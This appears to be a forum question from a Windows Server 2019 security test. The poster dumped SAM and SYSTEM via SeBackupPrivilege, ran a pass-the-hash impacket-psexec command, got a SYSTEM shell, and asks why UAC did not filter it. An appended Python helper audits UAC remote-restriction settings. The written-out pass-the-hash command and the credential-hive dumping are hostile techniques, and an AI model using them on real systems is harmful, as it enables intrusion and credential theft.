29 Feb
Pass-the-hash, why do I get a shell with high integrity?
I am testing the security of a Windows Server 2019 machine and have a question about remote access to the machine.
The user on the machine has the permission "SeBackupPrivilege". I can therefore dump the "Administrator" user's SAM and SYSTEM.
whoami /all
...
SeBackupPrivilege Back up files and directories Disabled
...
I then used the Administrator user's NTHash with PsExec to do a pass-the-hash attack. After doing this attack I get a shell with high integrity.
impacket-psexec -hashes :[NTHASH_HERE] administrator@10.10.10.10
C:\Windows\system32> whoami
nt authority\system
My question is, why do I get a shell with high integrity? Shouldn't UAC prevent this behavior? I would expect a shell with low integrity, given these settings as well:
UAC is enabled:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
LocalAccountTokenFilterPolicy is the default value:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy
ERROR: The system was unable to find the specified registry key or value.
FilterAdministratorToken is the default value:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken
ERROR: The system was unable to find the specified registry key or value.
To anyone who can clarify this doubt for me... thank you.
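An added example, not part of the original post: a small audit helper that parses `reg query` output in the shape shown above and reports whether UAC remote restrictions would filter the token of an administrator connecting over the network. The function names and the `EnableLUA` sample line are assumptions; the rules encode Microsoft's documented UAC remote-restriction behaviour and go one step beyond the post by also covering non-RID-500 local admins and domain accounts.

```python
import re

# Constructed sample in the shape of the `reg query` output in the post.
# The EnableLUA line is an assumption (the post does not show it); the two
# "ERROR:" results mean the value is absent and Windows uses its default.
SAMPLE = r'''
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA
    EnableLUA    REG_DWORD    0x1
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy
ERROR: The system was unable to find the specified registry key or value.
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken
ERROR: The system was unable to find the specified registry key or value.
'''

# Values used when a key is absent. EnableLUA=1 is assumed as a default here.
DEFAULTS = {"EnableLUA": 1, "LocalAccountTokenFilterPolicy": 0,
            "FilterAdministratorToken": 0}

VALUE_LINE = re.compile(r"^\s*(\w+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$", re.M)

def parse_reg_query(text):
    """Return the three policy values, falling back to defaults when absent."""
    policy = dict(DEFAULTS)
    for name, hexval in VALUE_LINE.findall(text):
        if name in policy:
            policy[name] = int(hexval, 16)
    return policy

def remote_admin_token(policy, account):
    """Token a member of Administrators gets on a network logon.

    account: 'builtin_admin' (RID 500), 'local_admin' or 'domain_admin'.
    """
    if account not in ("builtin_admin", "local_admin", "domain_admin"):
        raise ValueError(account)
    if policy["EnableLUA"] == 0:                      # UAC switched off
        return "full"
    if account == "domain_admin":                     # remote filtering covers local accounts only
        return "full"
    if policy["LocalAccountTokenFilterPolicy"] == 1:  # remote filtering disabled
        return "full"
    if account == "builtin_admin":                    # filtered only in Admin Approval Mode
        return "filtered" if policy["FilterAdministratorToken"] == 1 else "full"
    return "filtered"

if __name__ == "__main__":
    policy = parse_reg_query(SAMPLE)
    for account in ("builtin_admin", "local_admin", "domain_admin"):
        print(account, remote_admin_token(policy, account))
```

With the values shown in the post, the built-in Administrator is reported as `full` and any other local admin as `filtered`; setting `FilterAdministratorToken` to 1 brings RID 500 under the same remote filtering. `ConsentPromptBehaviorAdmin` is ignored by the helper because it controls the local elevation prompt, not remote token filtering.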